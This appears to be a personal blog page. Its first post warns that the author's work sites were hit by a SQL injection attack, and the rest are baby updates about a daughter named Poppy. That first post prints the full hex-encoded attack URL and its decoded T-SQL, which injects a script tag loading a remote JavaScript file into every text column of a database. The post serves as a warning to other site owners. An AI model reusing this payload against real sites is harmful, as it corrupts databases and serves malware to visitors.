Work sites attacked

Just an FYI – some of our old sites are not filtering out injection
attacks and got hosed last weekend. The attack seems fairly
sophisticated (imo) and is described in this post.

orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000
4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055
00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900
73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069
006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000
62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031
0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00
200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043
0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00
27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C
005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00
6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045
00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000
43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075
00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);–

If you just copy the hex value from this URL, as this…

0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610072006300680061007200280032003500
3500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C
00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C007300
7900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E0078007400790070
0065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F00
7200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062
006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F004300750072007300
6F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D003000290020
0042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B0040004300
2B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B0027
0027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F00
31002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062
006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F00
43007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200

And convert this to ASCII value, u can convert hex to ASCII

I got this…

DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor CURSOR FOR
select a.name’b.name from sysobjects a’syscolumns b where a.id=b.id and
a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T’@C
WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update ['+@T+'] set
['+@C+']=rtrim(convert(varchar’['+@C+']))+”<script
src=nihaorr1.com/1.js></script>”’)FETCH NEXT FROM
Table_Cursor INTO @T’@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

SQL Server Injection!!!! Here you can see the script being inserted
using Table Cursors, to each column in the table. If you read the code
you can see how each table in the entire database will be affected from
this.

The source of this came from 219.153.46.28,
28.46.153.219.broad.cq.cq.dynamic.163data.com.cn, the Agent is Indy
Library a CHINESE Bot. The agent Indy Library should be blocked entirly.

our attacks were similar and also coming from [219.153.46.28]

——————–

if you’ve got crappy/insecure code out there – be warned

Poppy went swimming for the first time, today

Poppy went swimming for the first time in her cute little two piece + diaper. Mom and Grannie C and Papa all helped keep her afloat. She did great, not always sure she knew what was going on, but was happy and absorbed the new experience without drinking too much chlorinated water. All told, she was probably in the water for almost an hour.

General update : in Houston, Poppy status = good

Update – we are in Houston for April and May. Staying w/ family and
Anita’s doing her last rotation at a hospital here. They are kicking
her ass and not even saying sorry… but it’s the home stretch till
she’s finally done with school forever! (YAY)

Poppy is big-tastic. She is holding her head up all the time,
laughing a little (when tickled or otherwise super-excited) and smiling
a lot. She’s almost on a schedule – which includes 15-30 min of crying
every night at bed time… but she’s sleeping in her crib like a champ
and is doing very well. She’s a little better w/ tummy time and has
super strong legs… just need to work on those arm muscles.

Photos: http://flickr.com/photos/zeroasterisk/collections/72157603816664754/ — look for new ones in 03 and a few in 04 (more to add sometime soon)

Poppy has laughed – for real – at almost 10 weeks

Penelope has laughed in her sleep and has done some sort-of laughs along the way, but last night, for the first time, she laughed.  We got several giggles from her.  We were tickling her and of course giggling ourselves, but regardless – she laughed.  We were beside ourselves, as would be expected.  She’s starting to make some syllable sounds, but it’s not very far along as of yet.